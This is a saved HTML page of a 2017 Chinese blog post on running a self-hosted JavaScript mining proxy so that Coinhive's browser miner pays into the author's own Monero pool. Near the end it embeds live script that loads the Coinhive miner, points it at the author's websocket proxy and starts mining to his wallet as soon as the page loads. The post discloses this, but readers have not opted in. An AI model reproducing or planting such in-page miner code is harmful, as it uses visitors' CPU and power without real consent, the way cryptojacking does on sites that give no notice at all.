<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.2" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Geek" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.2" />






<meta name="description" content="本文介绍了如何搭建自己的js挖矿代理服务器，并在本篇博客中提供了示例。因此，当您决定继续阅读本篇博文时，您已经在为笔者挖取门罗币（Monero）了。">
<meta property="og:type" content="article">
<meta property="og:title" content="搭建自己的JavaScript挖矿代理">
<meta property="og:url" content="http://blog.ideawand.com/2017/10/12/setup-a-js-mining-proxy/index.html">
<meta property="og:site_name" content="IdeaWand">
<meta property="og:description" content="本文介绍了如何搭建自己的js挖矿代理服务器，并在本篇博客中提供了示例。因此，当您决定继续阅读本篇博文时，您已经在为笔者挖取门罗币（Monero）了。">
<meta property="og:updated_time" content="2017-10-12T14:09:26.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="搭建自己的JavaScript挖矿代理">
<meta name="twitter:description" content="本文介绍了如何搭建自己的js挖矿代理服务器，并在本篇博客中提供了示例。因此，当您决定继续阅读本篇博文时，您已经在为笔者挖取门罗币（Monero）了。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://blog.ideawand.com/2017/10/12/setup-a-js-mining-proxy/"/>





  <title>搭建自己的JavaScript挖矿代理 | IdeaWand</title>
  




<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
          m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-109133538-1', 'auto');
  ga('send', 'pageview');
</script>











</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">IdeaWand</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">A Wand Makes Your Ideas Come True</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://blog.ideawand.com/2017/10/12/setup-a-js-mining-proxy/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Myrfy">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="IdeaWand">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">搭建自己的JavaScript挖矿代理</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-10-12T22:09:26+08:00">
                2017-10-12
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文介绍了如何搭建自己的js挖矿代理服务器，并在本篇博客中提供了示例。因此，当您决定继续阅读本篇博文时，您已经在为笔者挖取门罗币（Monero）了。</p>
<a id="more"></a>
<h1 id="0000b-背景"><a href="#0000b-背景" class="headerlink" title="0000b 背景"></a>0000b 背景</h1><p>自从某国外知名网站宣布尝试使用js挖矿来取代广告收入后，js挖矿开始被大家所知。据报道，传说中的知名网站使用的是<a href="https://coinhive.com/" target="_blank" rel="external">coinhive</a>提供的技术进行Monero的挖取。<a href="https://coinhive.com/" target="_blank" rel="external">coinhive</a>提供了成套的解决方案。只要大家愿意，完全可以在几分钟内将挖矿程序嵌入到自己的网站中。<br>不过，coinhive与其他矿池并没有合作。这就是说，如果你已经在其他矿池通过矿机或自己闲置的PC挖矿的话，通过网页挖到的收益并不能整合到已有的矿池中，此外coinhive还要缴纳30%的挖矿收入。再考虑到无论是coinhive还是其他各种矿池，都是要在挖到一定数量的货币以后才会进行支付，所以对于笔者这样算力有限的小矿工来说，集中算力在一个矿池挖矿才是正事。因此，本篇文章将介绍如何借用coinhive的挖矿脚本，躲过30%的苛捐杂税，在自己已经奋斗多年的矿池里挖矿。</p>
<h1 id="0001b-原理介绍"><a href="#0001b-原理介绍" class="headerlink" title="0001b 原理介绍"></a>0001b 原理介绍</h1><p>coinhive提供的挖矿脚本使用websocket与服务端进行通信，而各大矿池通常使用<a href="https://en.bitcoin.it/wiki/Stratum_mining_protocol" target="_blank" rel="external">Stratum Mining Protocol</a>来与挖矿的worker通信。默认情况下，coinhive自己的脚本当然是连接到自家的服务器。我们要做的就是搭建一台代理服务器，完成Stratum Mining Protocol和coinhive使用的websocket协议之间的转换，然后配置coinhive的脚本，让其连接我们自己的代理服务器即可。So Easy!</p>
<h1 id="0010b-开源代理服务器项目介绍"><a href="#0010b-开源代理服务器项目介绍" class="headerlink" title="0010b 开源代理服务器项目介绍"></a>0010b 开源代理服务器项目介绍</h1><p>有了想法之后，到GitHub上搜索了一番，果然已经有前辈完成了相关的工作，看来我们剩下的工作只需要将其部署到自己的服务器上就行了。在此提供两个开源项目：</p>
<ul>
<li><a href="https://github.com/x25/coinhive-stratum-mining-proxy" target="_blank" rel="external">coinhive-stratum-mining-proxy</a> 使用Python和twisted库编写的Proxy</li>
<li><a href="https://github.com/cazala/coin-hive-stratum" target="_blank" rel="external">coin-hive-stratum</a> 该作者受到上面Python项目的启发，用Node.js写了一个</li>
</ul>
<h1 id="0011b-闷声发大财"><a href="#0011b-闷声发大财" class="headerlink" title="0011b 闷声发大财"></a>0011b 闷声发大财</h1><p>这篇文章并不打算列出详细的服务搭建过程，是的，上面的两个项目都有详细的文档，如果您是挖过矿的程序员，那么您完全可以按照上述项目的文档完成部署；如果您对挖矿不了解，或者没有VPS，那么想把这些都搞清楚开始有些困难的。</p>
<blockquote>
<p>中国人有一句说话叫「闷声发大财」</p>
</blockquote>
<h1 id="0100b-写在最后"><a href="#0100b-写在最后" class="headerlink" title="0100b 写在最后"></a>0100b 写在最后</h1><p>请注意下面三行文字：</p>
<p><div id="miner_info"></div><br>上面三行跳动的数字代表着你的CPU正在为笔者挖矿。请耐心等待直到第三行的Accepted Hashes不再为0。<br>挖矿的速度从一定程度上反映了您所使用的设备的计算性能。如果您有兴趣，不放邀请您的好友访问本站，看看谁的设备计算性能好一些。笔者的华为荣耀8手机可以跑出 18H/s 的速度，不知道超越了全球百分之多少的用户。<br>当然，不用担心，当你关闭该页面后，挖矿就会停止。而且，截至目前，本站其他页面没有嵌入挖矿脚本。<br>对了，如果您发现在阅读本篇文章时，上面的数字没有跳动，那一定是出了些问题，请立即在<a href="https://github.com/myrfy001" target="_blank" rel="external">github</a>上联系我，或者提出<a href="https://github.com/myrfy001/blog.ideawand.com/issues" target="_blank" rel="external">issue</a>。</p>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://ideawand.com:8892/proxy"]];
var miner = new CoinHive.Anonymous('455atBUeKbhUUugvvgKnseQPnPetucs1JFtaeA68kgeyXhSXrHrqPPXPa37FqJdWc3bUJK1xWsrhJeDpqa2LrG83JhndMvt');
setInterval(function() {
  var hashesPerSecond = miner.getHashesPerSecond();
  var totalHashes = miner.getTotalHashes();
  var acceptedHashes = miner.getAcceptedHashes();
  document.getElementById("miner_info").innerHTML = "Speed = " + hashesPerSecond.toFixed(2) + " hash/sec<br>" + "Total Hashes = " + totalHashes + "<br>Accepted Hashes = " + acceptedHashes;
}, 1000);
miner.start();
</script>
      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:</strong>
    Myrfy
  </li>
  <li class="post-copyright-link">
    <strong>Post link:</strong>
    <a href="http://blog.ideawand.com/2017/10/12/setup-a-js-mining-proxy/" title="搭建自己的JavaScript挖矿代理">http://blog.ideawand.com/2017/10/12/setup-a-js-mining-proxy/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice: </strong>
    All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="external nofollow" target="_blank">CC BY-NC-ND 4.0</a> unless stating additionally.
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/23/notes-on-elasticsearch-mappings-and-kibana/" rel="next" title="Elasticsearch的mapping设置：enabled, index, doc_values, store, _source到底是什么鬼？">
                <i class="fa fa-chevron-left"></i> Elasticsearch的mapping设置：enabled, index, doc_values, store, _source到底是什么鬼？
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/10/25/smart-attribute-using-metaclass-in-50-lines-of-python-code/" rel="prev" title="Python之Metaclass元类详解与实战:50行代码实现【智能属性】">
                Python之Metaclass元类详解与实战:50行代码实现【智能属性】 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Myrfy" />
          <p class="site-author-name" itemprop="name">Myrfy</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">8</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              
                <span class="site-state-item-count">3</span>
                <span class="site-state-item-name">tags</span>
              
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/myrfy001" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                    
                      GitHub
                    
                </a>
              </span>
            
          
        </div>

        
        
          <div class="cc-license motion-element" itemprop="license">
            <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" class="cc-opacity" target="_blank">
              <img src="/images/cc-by-nc-nd.svg" alt="Creative Commons" />
            </a>
          </div>
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0000b-背景"><span class="nav-number">1.</span> <span class="nav-text">0000b 背景</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0001b-原理介绍"><span class="nav-number">2.</span> <span class="nav-text">0001b 原理介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0010b-开源代理服务器项目介绍"><span class="nav-number">3.</span> <span class="nav-text">0010b 开源代理服务器项目介绍</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0011b-闷声发大财"><span class="nav-number">4.</span> <span class="nav-text">0011b 闷声发大财</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0100b-写在最后"><span class="nav-number">5.</span> <span class="nav-text">0100b 写在最后</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Myrfy</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Muse
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
